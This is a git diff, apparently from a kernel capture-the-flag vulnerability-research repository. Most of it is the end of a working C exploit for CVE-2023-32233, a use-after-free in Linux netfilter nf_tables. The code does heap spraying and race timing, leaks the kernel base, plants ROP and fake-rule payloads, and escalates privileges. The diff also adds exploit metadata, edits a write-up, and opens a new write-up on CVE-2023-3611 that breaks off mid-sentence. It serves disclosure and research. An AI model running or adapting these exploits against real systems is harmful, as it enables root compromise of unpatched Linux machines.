(int spray = - 0x60; spray < 0x21; ++ spray) { + if (spray == 0) { + pwn_create_lookup_set_elem(batch, seq++, pwn_lookup_set, uaf_set_key, sizeof(uaf_set_key)); + } + else { + } + } + + pwn_create_lookup_rule(batch, seq++, pwn_lookup_chain, pwn_lookup_set); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_delay_spray_set(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_delay_spray_set\n"); + + seq = time(NULL); + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + pwn_create_set(batch, seq++, "set_delay", 1, 0, sizeof(uint64_t), 0, NULL, 0); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_delay_spray_set_elem(struct mnl_socket *nl, uint64_t *set_elem_key, uint64_t set_elem_key_end) +{ + uint32_t portid, seq, table_seq; + int ret; + + seq = time(NULL); + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, 
mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, pwn_family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, pwn_table); + nftnl_set_set_str(set, NFTNL_SET_NAME, "set_delay"); + + uint64_t count = set_elem_key_end - (*set_elem_key); + if (count > 0x800) { + count = 0x800; + } + while (count > 0) { + -- count; + + struct nftnl_set_elem *set_elem = nftnl_set_elem_alloc(); + if (set_elem == NULL) { + errx(1, "Cannot into nftnl_set_elem_alloc()"); + } + + nftnl_set_elem_set(set_elem, NFTNL_SET_ELEM_KEY, set_elem_key, sizeof(*set_elem_key)); + + nftnl_set_elem_add(set, set_elem); + + ++ (*set_elem_key); + } + + struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSETELEM, + NFPROTO_INET, + NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK, + seq++ + ); + nftnl_set_elems_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_trigger(struct mnl_socket *nl) +{ + struct mnl_nlmsg_batch *batch; + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_trigger\n"); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + append_del_rule(batch, seq++, NFPROTO_INET, "testfirewall", pwn_lookup_chain, -1); + + for (int spray = 2; spray < 10; spray += 2) { + char *set_name; + asprintf(&set_name, "spray_set_%04hx", spray); + append_del_set(batch, seq++, NFPROTO_INET, "testfirewall", set_name); + } + + append_del_set(batch, seq++, NFPROTO_INET, "testfirewall", "set_delay"); + + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, pwn_family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, pwn_table); + nftnl_set_set_str(set, NFTNL_SET_NAME, pwn_lookup_set); + + struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELSET, + NFPROTO_INET, + NLM_F_ACK, + seq++ + ); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + 
table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_race(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_race\n"); + + uint32_t set_desc_size; + if (cfg_race_set_slab == 0) { + set_desc_size = 0x0c; + } + else { + set_desc_size = 0x10; + } + + seq = time(NULL); + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for (int spray = 0; spray != 0x20; ++ spray) { + char *set_name; + asprintf(&set_name, "race_set_%0200hx", spray); + pwn_create_set(batch, seq++, set_name, spray, NFT_SET_ANONYMOUS, sizeof(uaf_set_key), set_desc_size, 0, 0); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_spray_chain(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_spray_chain\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for(int i = 0 ; i < 0x20; i++){ + char *chain_name; + asprintf(&chain_name, "spray_chain_%08hx", i); + pwn_create_leak_chain(batch, seq++, chain_name); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_spray_chain_rop(struct mnl_socket *nl) +{ + uint32_t seq; + + printf("pwn_uaf_spray_chain_rop\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + for(int i = 0x100; i < 0x180; i++){ + char *chain_name; + asprintf(&chain_name, "spray_chain_%08hx", i); + pwn_create_rop_chain(batch, seq++, chain_name); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); +} + +static void pwn_uaf_spray_chain_fake_rule(struct mnl_socket *nl) +{ + uint32_t seq; + + printf("pwn_uaf_spray_chain_fake_rule\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = 
mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + for(int i = 0x200; i < 0x300; i++){ + char *chain_name; + asprintf(&chain_name, "spray_chain_fake_rule_%08hx", i); + pwn_create_fake_rule_chain(batch, seq++, chain_name); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); +} + +static void pwn_uaf_del_rule(struct mnl_socket *nl, uint64_t handle) +{ + struct mnl_nlmsg_batch *batch; + uint32_t seq; + + printf("pwn_uaf_del_rule\n"); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if(handle == -1){ + for(int i = victim_rule_handle-2; i < victim_rule_handle; i++) + append_del_rule(batch, seq++, NFPROTO_INET, "testfirewall", pwn_log_chain, i); + } + else + append_del_rule(batch, seq++, NFPROTO_INET, "testfirewall", pwn_log_chain, handle); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); +} + +static void pwn_uaf_del_set(struct mnl_socket *nl) +{ + struct mnl_nlmsg_batch *batch; + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_del_set\n"); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for(uint64_t i = 0x60; i < 0x71; i++){ + append_del_set_handle(batch, seq++, NFPROTO_INET, "testfirewall", i); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_del_chain(struct mnl_socket *nl) +{ + struct mnl_nlmsg_batch *batch; + uint32_t seq; + + printf("pwn_uaf_del_chain\n"); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + for(int i = 0; i < 0x20; i++){ + char *chain_name; + asprintf(&chain_name, "spray_chain_%08hx", i); + append_del_chain(batch, seq++, NFPROTO_INET, "testfirewall", chain_name); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); +} + +static void pwn_read_dump_chain(struct mnl_socket *nl) +{ + uint32_t seq; + + printf("pwn_read_dump_chain\n"); + + struct nftnl_chain *chain = NULL; + + for(int i = 0; 
i < 0x20; i++){ + chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + seq = time(NULL); + struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr( + mnl_batch_buffer, + NFT_MSG_GETCHAIN, + NFPROTO_INET, + NLM_F_ACK, + seq + ); + + char *chain_name; + asprintf(&chain_name, "spray_chain_%08hx", i); + + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, "testfirewall"); + nftnl_chain_nlmsg_build_payload(nlh, chain); + nftnl_chain_free(chain); + + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + memset(mnl_batch_buffer, 0, sizeof(mnl_batch_buffer)); + + mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + + nft_counter_ops = *(unsigned long*) &mnl_batch_buffer[0x74]; + kbase = nft_counter_ops - NFT_COUNTER_OPS; + heap_addr = *(unsigned long*) &mnl_batch_buffer[0x64]; + victim_rule_handle = *(unsigned long*) &mnl_batch_buffer[0x6c] & 0xffff; + + if(nft_counter_ops != 0){ + hex_dump(mnl_batch_buffer, 0x80); + printf("[*] nft_counter_ops %lx kbase %lx heap_addr %lx handle %lx\n", + nft_counter_ops, kbase, heap_addr, victim_rule_handle); + break; + } + mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + } +} + +static void pwn_uaf_spray_rule(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_spray_rule\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for(int i = 0 ; i < 0x20; i++) + pwn_create_leak_rule(batch, seq++, pwn_log_chain); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static int pwn_main() +{ + struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + err(1, "Cannot into mnl_socket_open()"); + } + + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + err(1, "Cannot into mnl_socket_bind()"); + } + + pwn_prepare(nl); + + usleep(cfg_initial_usleep); + + pwn_uaf_spray(nl); + + pwn_delay_spray_set(nl); + + uint64_t race_set_elem_key = 0; + while (race_set_elem_key < cfg_race_set_elem_count) { + pwn_delay_spray_set_elem(nl, &race_set_elem_key, cfg_race_set_elem_count); + } + + pwn_uaf_trigger(nl); + usleep(cfg_race_lead_usleep); + pwn_uaf_race(nl); + usleep(cfg_race_lag_usleep); + + // spray chain + pwn_uaf_spray_chain(nl); + + // del set + pwn_uaf_del_set(nl); + usleep(cfg_reuse_usleep); + + // spray rule + pwn_uaf_spray_rule(nl); + + // dump chain udata + pwn_read_dump_chain(nl); + usleep(cfg_reuse_usleep); + + // del rule + pwn_uaf_del_rule(nl, -1); + usleep(cfg_reuse_usleep); + + // spray rop payload + pwn_uaf_spray_chain_rop(nl); + usleep(cfg_reuse_usleep); + + // del chain + pwn_uaf_del_chain(nl); + usleep(cfg_reuse_usleep); + + // alloc fake rule + pwn_uaf_spray_chain_fake_rule(nl); + 
usleep(cfg_reuse_usleep); + + // del rule + if(!fork()){ + pwn_uaf_del_rule(nl, 0xffff); + usleep(cfg_reuse_usleep); + win(); + } + + sleep(1000); + + return 0; +} + +void write_file(const char *filename, char *text) { + + int fd = open(filename, O_RDWR | O_CREAT); + + write(fd, text, strlen(text)); + close(fd); +} + +void new_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + char buffer[0x100]; + + unshare(CLONE_NEWUSER | CLONE_NEWNS); + + unshare(CLONE_NEWNET); + + write_file("/proc/self/setgroups", "deny"); + + snprintf(buffer, sizeof(buffer), "0 %d 1", uid); + write_file("/proc/self/uid_map", buffer); + snprintf(buffer, sizeof(buffer), "0 %d 1", gid); + write_file("/proc/self/gid_map", buffer); +} + +volatile int cpu_spinning = 1; + +static void pwn(size_t cpu_set_size, const cpu_set_t *cpu_set, int socketfd) +{ + int res; + + res = sched_setaffinity(0, cpu_set_size, cpu_set); + if (res != 0) { + err(1, "Cannot into sched_setaffinity()"); + } + + new_ns(); + + int status = pwn_main(); + + printf("[*] Signaling status=%d to coordinator...\n", status); + res = write(socketfd, &status, sizeof(status)); + if (res != sizeof(status)) { + err(1, "Cannot into write()"); + } + + while (cpu_spinning) { + usleep(60 * 1000 * 1000); + } +} + +/**************************************************************************** + * + * Coordinator + * + */ + +static int clone_helper(void *ctx) +{ + jmp_buf *env = ctx; + + longjmp(*env, 1); + err(1, "Cannot into pthread_attr_init()"); + return 1; +} + +__attribute__((noinline)) +static pid_t clone_with_longjmp(unsigned long flags, jmp_buf *env) +{ + char helper_stack_buffer[2 * PTHREAD_STACK_MIN + __BIGGEST_ALIGNMENT__]; + + uintptr_t helper_stack_addr = (uintptr_t) helper_stack_buffer; + helper_stack_addr += PTHREAD_STACK_MIN + __BIGGEST_ALIGNMENT__ - 1; + helper_stack_addr -= helper_stack_addr % __BIGGEST_ALIGNMENT__; + void *helper_stack = (void *) helper_stack_addr; + + pid_t pid = clone(clone_helper, helper_stack, flags, env); + if (pid == -1) { + err(1, "Cannot into clone()"); + } + + return pid; +} + +static void pwn_helper(size_t cpu_set_size, const cpu_set_t *cpu_set) +{ + int res; + + int socketfd[2]; + res = socketpair(AF_UNIX, SOCK_STREAM, 0, socketfd); + if (res != 0) { + err(1, "Cannot into socketpair()"); + } + + jmp_buf env; + if (setjmp(env) == 0) { + clone_with_longjmp(SIGCHLD, &env); + } + else { + res = close(socketfd[0]); + if (res != 0) { + err(1, "Cannot into close()"); + } + + char buf[1]; + res = read(socketfd[1], buf, sizeof(buf)); + if (res != sizeof(buf)) { + err(1, "Cannot into read()"); + } + + printf("[*] Starting PWN Worker\n"); + pwn(cpu_set_size, cpu_set, socketfd[1]); + err(1, "Unexpected return from exploit()"); + } + + res = close(socketfd[1]); + if (res != 0) { + err(1, "Cannot into close()"); + } + + printf("[*] Signaling PWN Worker...\n"); + char buf[1] = {}; + res = write(socketfd[0], buf, sizeof(buf)); + if (res != sizeof(buf)) { + err(1, "Cannot into write()"); + } + + printf("[*] Waiting for PWN Worker...\n"); + int status = EFAULT; + res = read(socketfd[0], &status, sizeof(status)); + if (res != sizeof(status)) { + err(1, "Cannot into read()"); + } + + win(); + exit(1); +} + +static void exploit() +{ + int cpu_alloc = 0x80; + size_t cpu_set_size; + + printf("[*] Netfilter UAF exploit\n\n"); + + cfg_load("profile"); + + cpu_set_size = CPU_ALLOC_SIZE(cpu_alloc); + cpu_set_t *cpu_affinity = CPU_ALLOC(cpu_alloc); + if (cpu_affinity == NULL) { + err(1, "Cannot into CPU_ALLOC()"); + } + + 
CPU_ZERO_S(cpu_set_size, cpu_affinity); + CPU_SET_S(0, cpu_set_size, cpu_affinity); + + pwn_helper(cpu_set_size, cpu_affinity); +} + +int main(int argc, char *argv[], char *envp[]) +{ + setbuf(stdout, NULL); + + exploit(); +} diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/metadata.json new file mode 100644 index 00000000..35a58a09 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/metadata.json @@ -0,0 +1,28 @@ +{ + "$schema" : "https://google.github.io/security-research/kernelctf/metadata.schema.v2.json", + "submission_ids": ["exp61"], + "vulnerability": { + "summary": "Use-After-Free in net/netfilter", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c1592a89942e9678f7d9c8030efa777c0d57edab", + "cve": "CVE-2023-32233", + "affected_versions": ["3.13-rc1 - 6.4-rc6"], + "requirements": { + "attack_surface": [], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", "CONFIG_NF_TABLES" + ] + } + }, + "exploits": [ + { + "environment": "mitigation-6.1.0", + "uses": [ + "userns" + ], + "requires_seperate_kaslr_leak":false, + "stability_notes" : "6 ~ 7 times success per 10 times run" + } + ] + } + \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/exploit.md index 454f9016..924191fd 100644 --- a/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/exploit.md +++ b/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/exploit.md @@ -193,27 +193,32 @@ static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set) After that, `nf_tables_destroy_set` function, which is eventually reached from `nf_tables_rule_destroy` [1], checks that the given set is an anonymous set and is not bind to anywhere [2]. If so, `nft_set_destroy` function frees this set [3]. -- [net/netfilter/nf_tables_api.c:nft_set_lookup()](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/net/netfilter/nf_tables_api.c?h=linux-6.1.y&id=d2869ace6eeb8ea8a6e70e6904524c5a6456d3fb#n3893) +- [net/netfilter/nf_tables_api.c:nft_set_lookup_byid()](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/net/netfilter/nf_tables_api.c?h=linux-6.1.y&id=d2869ace6eeb8ea8a6e70e6904524c5a6456d3fb#n3923) ```c -static struct nft_set *nft_set_lookup(const struct nft_table *table, - const struct nlattr *nla, u8 genmask) +static struct nft_set *nft_set_lookup_byid(const struct net *net, + const struct nft_table *table, + const struct nlattr *nla, u8 genmask) { - struct nft_set *set; - - if (nla == NULL) - return ERR_PTR(-EINVAL); - - list_for_each_entry_rcu(set, &table->sets, list) { - if (!nla_strcmp(nla, set->name) && - nft_active_genmask(set, genmask)) // [1] - return set; + struct nftables_pernet *nft_net = nft_pernet(net); + u32 id = ntohl(nla_get_be32(nla)); + struct nft_trans *trans; + + list_for_each_entry(trans, &nft_net->commit_list, list) { + if (trans->msg_type == NFT_MSG_NEWSET) { + struct nft_set *set = nft_trans_set(trans); + + if (id == nft_trans_set_id(trans) && + set->table == table && + nft_active_genmask(set, genmask)) // [1] + return set; + } } return ERR_PTR(-ENOENT); } ``` -Unfortunately, this freed set object is still accessible in the following commands of the same transaction. This is because this object was not properly deactivated (i.e., `nft_activate_genmask` will return true). 
From this, we can see why the patch works; It doesn't unbind the set object but only deactivates it, making it non-accessible.
+Unfortunately, this freed set object is still accessible in the following commands of the same transaction. This is because this object was still in the transaction list and not properly deactivated (i.e., `nft_activate_genmask` will return true). From this, we can see why the patch works; It doesn't unbind the set object but only deactivates it, making it non-accessible.
 
 ![vuln_2](./img/vuln_2.png)
diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/exploit.md
new file mode 100644
index 00000000..4fc0c80f
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/exploit.md
@@ -0,0 +1,622 @@
+Exploit Details
+===============
+
+Exploit demo for CVE-2023-3611.
+Flags:
+- `kernelCTF{v1:lts-6.1.35:1688135277:098358ab92b525678de0c42817048d693400c68e}`
+- `kernelCTF{v1:mitigation-6.1-v2:1688982924:6bdfebbb5220c89a748c8c7a0fbeec5d34988932}`
+
+Note: The original mitigation exploit targeted the `mitigation-6.1-broken` instance; it was later modified to work on `mitigation-6.1-v2`.
+
+
+# LTS
+## Summary
+
+At a high level the exploit performs the following:
+
+- Trigger the vulnerability into a user controlled buffer, leaving us with a controllable `struct qfq_group` object
+- Choose the object in such a way that we can trigger an OOB write into `struct qfq_sched`
+- Use this write to achieve a UaF in the `kmalloc-128` cache
+- Pivot to `struct tcf_proto` objects to obtain a KASLR leak as well as RIP control when we reclaim the object
+- Pivot the stack back into a user controlled buffer in the `kmalloc-8192` cache.
+
+## Steps in Detail
+
+### Step 1: Abusing the Vulnerability
+
+Triggering the vulnerability is trivial, though actually getting something useful
+out of the out-of-bounds group is not obvious.
+Even though the pointer is used in a few places, I identified only a few that
+seem particularly interesting from an exploitation perspective. We will focus on
+the following:
+```c
+static void qfq_schedule_agg(struct qfq_sched *q, struct qfq_aggregate *agg)
+{
+	struct qfq_group *grp = agg->grp;
+// ...
+	s = qfq_calc_state(q, grp);
+	__set_bit(grp->index, &q->bitmaps[s]); // [1]
+// ...
+}
+```
+
+Looking at `qfq_schedule_agg` we can see that we have a bit-set operation at a controlled index [1].
+The idea will be to flip a bit of a pointer to eventually cause a type confusion.
+Looking at `struct qfq_sched` we can see that there are only a few members
+available to us after the `bitmaps[]` member (we cannot use a negative index).
+
+```c
+struct qfq_sched {
+	struct tcf_proto __rcu *filter_list;
+	struct tcf_block	*block;
+	struct Qdisc_class_hash clhash;
+
+	u64			oldV, V;	/* Precise virtual times. */
+	struct qfq_aggregate	*in_serv_agg;	/* Aggregate being served. */
+	u32			wsum;		/* weight sum */
+	u32			iwsum;		/* inverse weight sum */
+
+	unsigned long bitmaps[QFQ_MAX_STATE];	    /* Group bitmaps. */
+	struct qfq_group groups[QFQ_MAX_INDEX + 1]; /* The groups. */
+	u32			min_slot_shift;	/* Index of the group-0 bit in the bitmaps. */
+
+	u32			max_agg_classes; /* Max number of classes per aggr. */
+	struct hlist_head	nonfull_aggs;	 /* Aggs with room for more classes. */
+};
+```
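+
+To make the index arithmetic concrete: `__set_bit(grp->index, &q->bitmaps[s])`
+touches bit `index % 64` of the `unsigned long` located `(index / 64) * 8` bytes
+after `bitmaps[s]`. A small sketch of how an index reaching a later member such
+as `nonfull_aggs` could be derived (assuming `s == 0` for simplicity; the real
+base depends on `qfq_calc_state()`):
+
+```c
+/* Returns the grp->index value that makes __set_bit() flip bit `bit` of the
+ * member at byte offset member_off, given bitmaps[] at byte offset
+ * bitmaps_off inside struct qfq_sched. */
+unsigned long target_index(unsigned long member_off, unsigned long bitmaps_off,
+                           unsigned int bit)
+{
+    return (member_off - bitmaps_off) * 8 + bit;
+}
+```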
+
+The `nonfull_aggs` member is interesting as this list will be used to look up
+aggregates when creating new classes:
+```c
+static struct qfq_aggregate *qfq_find_agg(struct qfq_sched *q,
+					  u32 lmax, u32 weight)
+{
+	struct qfq_aggregate *agg;
+
+	hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next)
+		if (agg->lmax == lmax && agg->class_weight == weight)
+			return agg;
+
+	return NULL;
+}
+```
+The idea will be to smuggle a fake `qfq_aggregate` into the qdisc which is
